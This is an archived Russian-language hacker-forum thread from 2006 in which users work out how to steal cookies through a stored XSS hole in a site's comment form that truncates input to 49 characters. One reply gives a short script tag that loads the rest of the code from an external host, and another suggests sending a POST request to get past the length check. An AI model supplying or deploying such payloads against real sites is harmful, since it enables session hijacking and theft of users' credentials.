Просмотр полной версии : 49 символов для Xss атаки
Есть уязвимость на сайте: в форме комментариев можно вписать html теги. Как можно сформировать такой JavaScript, шоб своровать куки для формы в 49 символов (обрезаеться базой)?
GreenBear
19.11.2006, 23:06
http://forum.antichat.ru/thread25933.html
Green_Bear, да, это все понятно. У меня для формы доступно только 49 символов, я не могу ничего придумать, шоб как-нить сформировать рабочий код. (я в первом сообщении исправил про 49 символов)
<script src='http://site.ru/a.js'></script>
А в site.ru/a.js написать остальной код
nc.STRIEM
19.11.2006, 23:55
А чем эти 49 символов обрезаються???? Есле это ограничение в форме, то прост пошли POST запрос, в самао скрипте редко длинна проверяеться!
а ваше смотри что те _Great_ написал! ;)
А чем эти 49 символов обрезаються???? Есле это ограничение в форме, то прост пошли Post запрос, в самао скрипте редко длинна проверяеться!
он же написал - базой.. а это хреново. Но моим способом уложиться можно
супер, ребята спасибо!!!!
_Great_
а у мня вопрос а если перед вставкой в бд например он проверяет кол-во символов поступающих получиться что он еще и посчитает все символы и с файла который вставляем ведь!Верно?
GreenBear
20.11.2006, 17:20
ну ты гонишь. ничего там не будет считать с файла.
JS выполняется на СТОРОНЕ КЛИЕНТА. Серверу посрать какие файлы куда включены в коде. он тупо включает эти символы (js-код) в базу и ничего больше.
Включение файла делает браузер у клиента
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot